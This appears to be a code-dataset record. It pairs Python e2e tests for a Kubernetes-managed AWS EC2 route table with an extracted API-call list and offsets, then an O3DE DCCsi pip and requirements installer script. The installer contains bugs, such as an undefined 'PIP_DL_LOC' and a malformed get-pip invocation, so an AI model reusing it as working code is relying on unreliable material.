resource_name = random_suffix_name("route-table-test", 24)
test_vpc = get_bootstrap_resources().SharedTestVPC
vpc_id = test_vpc.vpc_id
igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
test_cidr_block = "192.168.0.0/24"
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = vpc_id
test_resource_values["IGW_ID"] = igw_id
test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
# Load Route Table CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["routeTableID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Route Table exists
assert route_table_exists(ec2_client, resource_id)
# Delete k8s resource
_, deleted = k8s.delete_custom_resource(ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Route Table doesn't exist
exists = route_table_exists(ec2_client, resource_id)
assert not exists
def test_terminal_condition(self):
test_resource_values = REPLACEMENT_VALUES.copy()
resource_name = random_suffix_name("route-table-fail", 24)
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = "InvalidVpcId"
# Load RouteTable CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create k8s resource
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
expected_msg = "InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist"
terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
# Example condition message:
# InvalidVpcID.NotFound: The vpc ID 'InvalidVpcId' does not exist
# status code: 400, request id: 5801fc80-67cf-465f-8b83-5e02d517d554
# This check only verifies the error message; the request hash is irrelevant and therefore can be ignored.
assert expected_msg in terminal_condition['message']
def test_crud_route(self, ec2_client):
test_resource_values = REPLACEMENT_VALUES.copy()
resource_name = random_suffix_name("route-table-test", 24)
test_vpc = get_bootstrap_resources().SharedTestVPC
vpc_id = test_vpc.vpc_id
igw_id = test_vpc.public_subnets.route_table.internet_gateway.internet_gateway_id
test_cidr_block = "192.168.0.0/24"
test_resource_values["ROUTE_TABLE_NAME"] = resource_name
test_resource_values["VPC_ID"] = vpc_id
test_resource_values["IGW_ID"] = igw_id
test_resource_values["DEST_CIDR_BLOCK"] = test_cidr_block
# Load Route Table CR
resource_data = load_ec2_resource(
"route_table",
additional_replacements=test_resource_values,
)
logging.debug(resource_data)
# Create Route Table
ref = k8s.CustomResourceReference(
CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,
resource_name, namespace="default",
)
k8s.create_custom_resource(ref, resource_data)
cr = k8s.wait_resource_consumed_by_controller(ref)
assert cr is not None
assert k8s.get_resource_exists(ref)
resource = k8s.get_resource(ref)
resource_id = resource["status"]["routeTableID"]
time.sleep(CREATE_WAIT_AFTER_SECONDS)
# Check Route Table exists
assert route_table_exists(ec2_client, resource_id)
# Check Routes exist (default and desired)
routes = get_routes(ec2_client, resource_id)
for route in routes:
if route["GatewayId"] == "local":
default_cidr = route["DestinationCidrBlock"]
assert route["Origin"] == "CreateRouteTable"
elif route["GatewayId"] == igw_id:
assert route["Origin"] == "CreateRoute"
else:
assert False
# Update Route
updated_cidr = "192.168.1.0/24"
patch = {"spec": {"routes": [
{
#Default route cannot be changed
"destinationCIDRBlock": default_cidr,
"gatewayID": "local"
},
{
"destinationCIDRBlock": updated_cidr,
"gatewayID": igw_id
}
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
# assert patched state
resource = k8s.get_resource(ref)
assert len(resource['status']['routeStatuses']) == 2
for route in resource['status']['routeStatuses']:
if route["gatewayID"] == "local":
assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
elif route["gatewayID"] == igw_id:
# origin and state are set server-side
assert route_exists(ec2_client, resource_id, igw_id, "CreateRoute")
assert route["state"] == "active"
else:
assert False
# Delete Route
patch = {"spec": {"routes": [
{
"destinationCIDRBlock": default_cidr,
"gatewayID": "local"
}
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
resource = k8s.get_resource(ref)
assert len(resource['spec']['routes']) == 1
for route in resource['spec']['routes']:
if route["gatewayID"] == "local":
assert route_exists(ec2_client, resource_id, "local", "CreateRouteTable")
else:
assert False
# Should not be able to delete default route
patch = {"spec": {"routes": [
]
}
}
_ = k8s.patch_custom_resource(ref, patch)
time.sleep(DEFAULT_WAIT_AFTER_SECONDS)
expected_msg = "InvalidParameterValue: cannot remove local route"
terminal_condition = k8s.get_resource_condition(ref, "ACK.Terminal")
assert expected_msg in terminal_condition['message']
# Delete Route Table
_, deleted = k8s.delete_custom_resource(ref)
assert deleted is True
time.sleep(DELETE_WAIT_AFTER_SECONDS)
# Check Route Table doesn't exist
exists = route_table_exists(ec2_client, resource_id)
assert not exists | [
"logging.debug",
"acktest.k8s.resource.get_resource_exists",
"acktest.k8s.resource.delete_custom_resource",
"acktest.k8s.resource.wait_resource_consumed_by_controller",
"acktest.k8s.resource.get_resource",
"acktest.k8s.resource.get_resource_condition",
"acktest.resources.random_suffix_name",
"time.sle... | [((2359, 2384), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (2382, 2384), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((2409, 2451), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-test"""', '(24)'], {}), "('route-table-test', 24)\n", (2427, 2451), False, 'from acktest.resources import random_suffix_name\n'), ((2960, 3038), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (2977, 3038), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((3082, 3110), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (3095, 3110), False, 'import logging\n'), ((3156, 3264), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (3183, 3264), True, 'from acktest.k8s import resource as k8s\n'), ((3304, 3350), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (3330, 3350), True, 'from acktest.k8s import resource as k8s\n'), ((3364, 3409), 'acktest.k8s.resource.wait_resource_consumed_by_controller', 'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (3404, 3409), True, 'from acktest.k8s import resource as k8s\n'), ((3456, 3484), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (3479, 3484), True, 'from acktest.k8s import resource as k8s\n'), ((3505, 3526), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (3521, 3526), True, 'from acktest.k8s import resource as k8s\n'), ((3593, 3630), 'time.sleep', 'time.sleep', (['CREATE_WAIT_AFTER_SECONDS'], {}), '(CREATE_WAIT_AFTER_SECONDS)\n', (3603, 3630), False, 'import time\n'), ((3778, 3809), 'acktest.k8s.resource.delete_custom_resource', 'k8s.delete_custom_resource', (['ref'], {}), '(ref)\n', (3804, 3809), True, 'from acktest.k8s import resource as k8s\n'), ((3850, 3887), 'time.sleep', 'time.sleep', (['DELETE_WAIT_AFTER_SECONDS'], {}), '(DELETE_WAIT_AFTER_SECONDS)\n', (3860, 3887), False, 'import time\n'), ((4090, 4115), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (4113, 4115), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((4140, 4182), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-fail"""', '(24)'], {}), "('route-table-fail', 24)\n", (4158, 4182), False, 'from acktest.resources import random_suffix_name\n'), ((4358, 4436), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (4375, 4436), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((4480, 4508), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (4493, 4508), False, 'import logging\n'), ((4554, 4662), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (4581, 4662), True, 'from acktest.k8s import resource as k8s\n'), ((4702, 4748), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (4728, 4748), True, 'from acktest.k8s import resource as k8s\n'), ((4762, 4807), 'acktest.k8s.resource.wait_resource_consumed_by_controller', 'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (4802, 4807), True, 'from acktest.k8s import resource as k8s\n'), ((4854, 4882), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (4877, 4882), True, 'from acktest.k8s import resource as k8s\n'), ((5002, 5049), 'acktest.k8s.resource.get_resource_condition', 'k8s.get_resource_condition', (['ref', '"""ACK.Terminal"""'], {}), "(ref, 'ACK.Terminal')\n", (5028, 5049), True, 'from acktest.k8s import resource as k8s\n'), ((5493, 5518), 'e2e.replacement_values.REPLACEMENT_VALUES.copy', 'REPLACEMENT_VALUES.copy', ([], {}), '()\n', (5516, 5518), False, 'from e2e.replacement_values import REPLACEMENT_VALUES\n'), ((5543, 5585), 'acktest.resources.random_suffix_name', 'random_suffix_name', (['"""route-table-test"""', '(24)'], {}), "('route-table-test', 24)\n", (5561, 5585), False, 'from acktest.resources import random_suffix_name\n'), ((6094, 6172), 'e2e.load_ec2_resource', 'load_ec2_resource', (['"""route_table"""'], {'additional_replacements': 'test_resource_values'}), "('route_table', additional_replacements=test_resource_values)\n", (6111, 6172), False, 'from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource\n'), ((6216, 6244), 'logging.debug', 'logging.debug', (['resource_data'], {}), '(resource_data)\n', (6229, 6244), False, 'import logging\n'), ((6289, 6397), 'acktest.k8s.resource.CustomResourceReference', 'k8s.CustomResourceReference', (['CRD_GROUP', 'CRD_VERSION', 'RESOURCE_PLURAL', 'resource_name'], {'namespace': '"""default"""'}), "(CRD_GROUP, CRD_VERSION, RESOURCE_PLURAL,\n resource_name, namespace='default')\n", (6316, 6397), True, 'from acktest.k8s import resource as k8s\n'), ((6437, 6483), 'acktest.k8s.resource.create_custom_resource', 'k8s.create_custom_resource', (['ref', 'resource_data'], {}), '(ref, resource_data)\n', (6463, 6483), True, 'from acktest.k8s import resource as k8s\n'), ((6497, 6542), 'acktest.k8s.resource.wait_resource_consumed_by_controller', 'k8s.wait_resource_consumed_by_controller', (['ref'], {}), '(ref)\n', (6537, 6542), True, 'from acktest.k8s import resource as k8s\n'), ((6589, 6617), 'acktest.k8s.resource.get_resource_exists', 'k8s.get_resource_exists', (['ref'], {}), '(ref)\n', (6612, 6617), True, 'from acktest.k8s import resource as k8s\n'), ((6638, 6659), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (6654, 6659), True, 'from acktest.k8s import resource as k8s\n'), ((6726, 6763), 'time.sleep', 'time.sleep', (['CREATE_WAIT_AFTER_SECONDS'], {}), '(CREATE_WAIT_AFTER_SECONDS)\n', (6736, 6763), False, 'import time\n'), ((7834, 7871), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (7859, 7871), True, 'from acktest.k8s import resource as k8s\n'), ((7880, 7918), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], {}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (7890, 7918), False, 'import time\n'), ((7970, 7991), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (7986, 7991), True, 'from acktest.k8s import resource as k8s\n'), ((8805, 8842), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (8830, 8842), True, 'from acktest.k8s import resource as k8s\n'), ((8851, 8889), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], {}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (8861, 8889), False, 'import time\n'), ((8910, 8931), 'acktest.k8s.resource.get_resource', 'k8s.get_resource', (['ref'], {}), '(ref)\n', (8926, 8931), True, 'from acktest.k8s import resource as k8s\n'), ((9363, 9400), 'acktest.k8s.resource.patch_custom_resource', 'k8s.patch_custom_resource', (['ref', 'patch'], {}), '(ref, patch)\n', (9388, 9400), True, 'from acktest.k8s import resource as k8s\n'), ((9409, 9447), 'time.sleep', 'time.sleep', (['DEFAULT_WAIT_AFTER_SECONDS'], {}), '(DEFAULT_WAIT_AFTER_SECONDS)\n', (9419, 9447), False, 'import time\n'), ((9552, 9599), 'acktest.k8s.resource.get_resource_condition', 'k8s.get_resource_condition', (['ref', '"""ACK.Terminal"""'], {}), "(ref, 'ACK.Terminal')\n", (9578, 9599), True, 'from acktest.k8s import resource as k8s\n'), ((9712, 9743), 'acktest.k8s.resource.delete_custom_resource', 'k8s.delete_custom_resource', (['ref'], {}), '(ref)\n', (9738, 9743), True, 'from acktest.k8s import resource as k8s\n'), ((9784, 9821), 'time.sleep', 'time.sleep', (['DELETE_WAIT_AFTER_SECONDS'], {}), '(DELETE_WAIT_AFTER_SECONDS)\n', (9794, 9821), False, 'import time\n'), ((1298, 1314), 'logging.debug', 'logging.debug', (['e'], {}), '(e)\n', (1311, 1314), False, 'import logging\n'), ((1800, 1816), 'logging.debug', 'logging.debug', (['e'], {}), '(e)\n', (1813, 1816), False, 'import logging\n'), ((2471, 2496), 'e2e.bootstrap_resources.get_bootstrap_resources', 'get_bootstrap_resources', ([], {}), '()\n', (2494, 2496), False, 'from e2e.bootstrap_resources import get_bootstrap_resources\n'), ((5605, 5630), 'e2e.bootstrap_resources.get_bootstrap_resources', 'get_bootstrap_resources', ([], {}), '()\n', (5628, 5630), False, 'from e2e.bootstrap_resources import get_bootstrap_resources\n')] |
# coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi > / foundation.py
Running this module installs the DCCsi python requirements.txt for other python interpreters (like Maya)
It installs based on the python version into a location (such as):
<o3de>/Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/3rdParty/Python/Lib/3.x
This is to ensure that we are not modifying the users DCC tools install directly.
For this script to function on windows you may need Administrator privledges.
^ You only have to start with Admin rights if you are running foundation.py or otherwise updating packages
Open an admin elevated cmd prompt here:
C:\depot\o3de-dev\Gems\AtomLyIntegration\TechnicalArt\DccScriptingInterface
The following would execpt this script, the default behaviour is to check
the o3de python and install the requirements.txt for that python version,
>python.cmd foundation.py
To Do: document additional usage (how to install for Maya 2022 py3.7, etc.)
"""
# -------------------------------------------------------------------------
# standard imports
import subprocess
import sys
import os
import site
import timeit
import inspect
import traceback
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
#os.environ['PYTHONINSPECT'] = 'True'
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'foundation'
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Local access
_MODULE_PATH = Path(__file__) # this script
_PATH_DCCSIG = Path(_MODULE_PATH.parent) # dccsi
os.environ['PATH_DCCSIG'] = _PATH_DCCSIG.as_posix()
site.addsitedir(_PATH_DCCSIG.as_posix()) # python path
os.chdir(_PATH_DCCSIG.as_posix())
# the path we want to install packages into
STR_PATH_DCCSI_PYTHON_LIB = str('{0}\\3rdParty\\Python\\Lib\\{1}.x\\{1}.{2}.x\\site-packages')
# these are just defaults and are meant to be replaced by info for the target python.exe
_SYS_VER_MAJOR = sys.version_info.major
_SYS_VER_MINOR = sys.version_info.minor
# the default will be based on the python executable running this module
# this value should be replaced with the sys,version of the target python
# for example mayapy, or blenders python, etc.
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
_SYS_VER_MAJOR,
_SYS_VER_MINOR))
# this is the shared default requirements.txt file to install for python 3.6.x+
_DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt')
# this will default to the python interpretter running this script (probably o3de)
# this should be relaced by the target interpretter python exe, like mayapy.exe
_PYTHON_EXE = Path(sys.executable)
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def check_pip(python_exe=_PYTHON_EXE):
"""Check if pip is installed and log what version"""
python_exe = Path(python_exe)
if python_exe.exists():
result = subprocess.call( [python_exe.as_posix(), "-m", "pip", "--version"] )
_LOGGER.info(f'foundation.check_pip(), result: {result}')
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 1
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def ensurepip(python_exe=_PYTHON_EXE, upgrade=False):
"""Will use ensurepip method to ensure pip is installed"""
#note: this doesn't work with python 3.7 which is the version o3de is on
#luckily o3de comes with working pip
#if this errors out with an exception and "ValueError: bad marshal data (unknown type code)"
#you should try to install pip using dfoundation.install_pip() method
result = 0
python_exe = Path(python_exe)
if python_exe.exists():
if upgrade:
result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip", "--upgrade"] )
_LOGGER.info(f'foundation.ensurepip(python_exe, upgrade=True), result: {result}')
else:
result = subprocess.call( [python_exe.as_posix(), "-m", "ensurepip"] )
_LOGGER.info(f'foundation.ensurepip(python_exe), result: {result}')
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_GET_PIP_PY37_URL = "https://bootstrap.pypa.io/get-pip.py"
_GET_PIP_PY27_URL = "https://bootstrap.pypa.io/pip/2.7/get-pip.py"
# version to download (DL)
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
DL_URL = _GET_PIP_PY37_URL
elif sys.version_info.major < 3:
DL_URL = _GET_PIP_PY27_URL
# temp dir to store in:
_PIP_DL_LOC = Path(_PATH_DCCSIG) / '__tmp__'
if not _PIP_DL_LOC.exists():
try:
_PIP_DL_LOC.mkdir(parents=True)
except Exception as e:
_LOGGER.error(f'error: {e}, could not .mkdir(): {PIP_DL_LOC.as_posix()}')
# default file location to store it:
_PIP_DL_LOC = _PIP_DL_LOC / 'get-pip.py'
try:
_PIP_DL_LOC.touch(mode=0o666, exist_ok=True)
except Exception as e:
_LOGGER.error(f'error: {e}, could not .touch(): {PIP_DL_LOC.as_posix()}')
def download_getpip(url=DL_URL, file_store=_PIP_DL_LOC):
"""Attempts to download the get-pip.py script"""
import requests
# ensure what is passed in is a Path object
file_store = Path(file_store)
file_store = Path.joinpath(file_store)
try:
file_store.exists()
except FileExistsError as e:
try:
file_store.touch()
except FileExistsError as e:
_LOGGER.error(f'Could not make file: {file_store}')
try:
_get_pip = requests.get(url)
except Exception as e:
_LOGGER.error(f'could not request: {url}')
try:
file = open(file_store.as_posix(), 'wb').write(_get_pip.content)
return file
except IOError as e:
_LOGGER.error(f'could not write: {file_store.as_posix()}')
return None
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pip(python_exe=_PYTHON_EXE, download=True, upgrade=True, getpip=_PIP_DL_LOC):
"""Installs pip via get-pip.py"""
result = 0
if download:
getpip = download_getpip()
if not getpip:
return result
python_exe = Path(python_exe)
if python_exe.exists():
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", getpip] )
_LOGGER.info(f'result: {result}')
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
if upgrade:
python_exe = python_exe.as_posix()
result = subprocess.call( [python_exe, "-m", "pip", "install", "--upgrade", "pip"] )
_LOGGER.info(f'result: {result}')
return result
return result
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# version of requirements.txt to installa
if sys.version_info.major >= 3 and sys.version_info.minor >= 7:
_REQUIREMENTS = _DCCSI_PYTHON_REQUIREMENTS
elif sys.version_info.major == 2 and sys.version_info.minor >= 7:
_LOGGER.warning('Python 2.7 is end of life, we recommend using tools that operate py3.7 or higher')
_REQUIREMENTS = Path(_PATH_DCCSIG,
'Tools',
'Resources',
'py27',
'requirements.txt').as_posix()
else:
_REQUIREMENTS = None
_LOGGER.error(f'Unsupported version: {sys.version_info}')
def install_requirements(python_exe=_PYTHON_EXE,
requirements=_REQUIREMENTS,
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs the DCCsi requirments.txt"""
python_exe = Path(python_exe)
requirements = Path(requirements)
target_loc = Path(target_loc)
if python_exe.exists():
## install required packages
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install",
"-r", requirements.as_posix(), "-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def install_pkg(python_exe=_PYTHON_EXE,
pkg_name='pathlib',
target_loc=_PATH_DCCSI_PYTHON_LIB.as_posix()):
"""Installs a pkg for DCCsi"""
python_exe = Path(python_exe)
pkg_name = Path(pkg_name)
target_loc = Path(target_loc)
if python_exe.exists():
inst_cmd = [python_exe.as_posix(), "-m", "pip", "install", pkg_name.as_posix(),
"-t", target_loc.as_posix()]
result = subprocess.call( inst_cmd )
return result
else:
_LOGGER.error(f'python_exe does not exist: {python_exe}')
return 0
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def run_command() -> 'subprocess.CompletedProcess[str]':
"""Run some subprocess that captures output as ``str``"""
return subprocess.CompletedProcess(args=[], returncode=0, stdout='')
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def arg_bool(bool_arg, desc='arg desc not set'):
"""cast a arg bool to a python bool"""
_LOGGER.info(f"Checking '{desc}': {bool_arg}")
if bool_arg in ('True', 'true', '1'):
return True
elif bool_arg in ('False', 'false', '0'):
return False
else:
return bool_arg
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def set_version(ver_major=sys.version_info.major, ver_minor=sys.version_info.minor):
global _SYS_VER_MAJOR
global _SYS_VER_MINOR
global _PATH_DCCSI_PYTHON_LIB
_SYS_VER_MAJOR = ver_major
_SYS_VER_MINOR = ver_minor
_PATH_DCCSI_PYTHON_LIB = Path(STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
_SYS_VER_MAJOR,
_SYS_VER_MINOR))
return _PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
def get_version(_PYTHON_EXE):
_PYTHON_EXE = Path(_PYTHON_EXE)
if _PYTHON_EXE.exists():
# this will switch to run the specified dcc tools python exe and determine version
_COMMAND = [_PYTHON_EXE.as_posix(), "--version"]
_process = subprocess.Popen(_COMMAND, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
_out, _err = _process.communicate()
_out = _out.decode("utf-8") # decodes byte string to string
_out = _out.replace("\r\n", "") # clean
_LOGGER.info(f'Python Version is: {_out}')
_ver = _out.split(" ")[-1] # split by space, take version
_ver = _ver.split('.') # splity by . to list
return _ver
else:
_LOGGER.error(f'Python exe does not exist: {_PYTHON_EXE.as_posix()}')
return None
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as main (external commandline)"""
#os.environ['PYTHONINSPECT'] = 'True'
STR_CROSSBAR = f"{'-' * 74}"
_DCCSI_GDEBUG = False
_DCCSI_DEV_MODE = False
# default loglevel to info unless set
_DCCSI_LOGLEVEL = _logging.INFO
if _DCCSI_GDEBUG:
# override loglevel if runnign debug
_DCCSI_LOGLEVEL = _logging.DEBUG
FRMT_LOG_LONG = "[%(name)s][%(levelname)s] >> %(message)s (%(asctime)s; %(filename)s:%(lineno)d)"
# configure basic logger
# note: not using a common logger to reduce cyclical imports
_logging.basicConfig(level=_DCCSI_LOGLEVEL,
format=FRMT_LOG_LONG,
datefmt='%m-%d %H:%M')
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.info(STR_CROSSBAR)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
_LOGGER.debug('_DCCSI_GDEBUG: {}'.format(_DCCSI_GDEBUG))
_LOGGER.debug('_DCCSI_DEV_MODE: {}'.format(_DCCSI_DEV_MODE))
_LOGGER.debug('_DCCSI_LOGLEVEL: {}'.format(_DCCSI_LOGLEVEL))
import argparse
parser = argparse.ArgumentParser(
description='O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools.',
epilog="It is suggested to use '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
parser.add_argument('-gd', '--global-debug',
type=bool,
required=False,
help='Enables global debug flag.')
parser.add_argument('-dm', '--developer-mode',
type=bool,
required=False,
default=False,
help='(NOT IMPLEMENTED) Enables dev mode for early auto attaching debugger.')
parser.add_argument('-sd', '--set-debugger',
type=str,
required=False,
default='WING',
help='(NOT IMPLEMENTED) Default debugger: WING, others: PYCHARM and VSCODE.')
parser.add_argument('-py', '--python_exe',
type=str,
required=False,
help='The python interpretter you want to run in the subprocess')
parser.add_argument('-cp', '--check_pip',
required=False,
default=True,
help='Checks for pip')
parser.add_argument('-ep', '--ensurepip',
required=False,
default=False,
help='Uses ensurepip, to make sure pip is installed')
parser.add_argument('-ip', '--install_pip',
required=False,
default=False,
help='Attempts install pip via download of get-pip.py')
parser.add_argument('-ir', '--install_requirements',
required=False,
default=True,
help='Exits python')
parser.add_argument('-ex', '--exit',
type=bool,
required=False,
default=False,
help='Exits python. Do not exit if you want to be in interactive interpretter after config')
args = parser.parse_args()
# easy overrides
if args.global_debug:
_DCCSI_GDEBUG = True
os.environ["DYNACONF_DCCSI_GDEBUG"] = str(_DCCSI_GDEBUG)
if not args.python_exe:
_LOGGER.warning("It is suggested to use arg '-py' or '--python_exe' to pass in the python exe for the target dcc tool.")
if args.python_exe:
_PYTHON_EXE = Path(args.python_exe)
_LOGGER.info(f'Target py exe is: {_PYTHON_EXE}')
if _PYTHON_EXE.exists():
_py_version = get_version(_PYTHON_EXE)
# then we can change the version dependant target folder for pkg install
_PATH_DCCSI_PYTHON_LIB = set_version(_py_version[0], _py_version[1])
if _PATH_DCCSI_PYTHON_LIB.exists():
_LOGGER.info(f'Requirements, install target: {_PATH_DCCSI_PYTHON_LIB}')
else:
_PATH_DCCSI_PYTHON_LIB.touch()
_LOGGER.info(f'.touch(): {_PATH_DCCSI_PYTHON_LIB}')
else:
_LOGGER.error(f'This py exe does not exist:{_PYTHON_EXE}')
sys.exit()
# this will verify pip is installed for the target python interpretter/env
if arg_bool(args.check_pip, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.check_pip()')
result = check_pip(_PYTHON_EXE)
if result != 0:
_LOGGER.warning( f'check_pip(), Invalid result: { result }' )
if arg_bool(args.ensurepip, desc='args.ensurepip'):
_LOGGER.info(f'calling foundation.ensurepip()')
ensurepip(_PYTHON_EXE)
if arg_bool(args.install_pip, desc='args.install_pip'):
_LOGGER.info(f'calling foundation.install_pip()')
install_pip(_PYTHON_EXE)
# installing the requirments.txt is enabled by default
if arg_bool(args.install_requirements, desc='args.check_pip'):
_LOGGER.info(f'calling foundation.install_requirements( {_PYTHON_EXE}, target_loc = {_PATH_DCCSI_PYTHON_LIB.as_posix()} )')
install_requirements(_PYTHON_EXE, target_loc = _PATH_DCCSI_PYTHON_LIB.as_posix())
# -- DONE ----
_LOGGER.info(STR_CROSSBAR)
_LOGGER.info('O3DE DCCsi {0}.py took: {1} sec'.format(_MODULENAME, timeit.default_timer() - _START))
if args.exit:
import sys
# return
sys.exit()
else:
# custom prompt
sys.ps1 = "[{}]>>".format(_MODULENAME)
# --- END -----------------------------------------------------------------
| [
"logging.getLogger",
"logging.basicConfig",
"pathlib.Path.joinpath",
"pathlib.Path",
"argparse.ArgumentParser",
"timeit.default_timer",
"subprocess.CompletedProcess",
"subprocess.Popen",
"requests.get",
"subprocess.call",
"sys.exit"
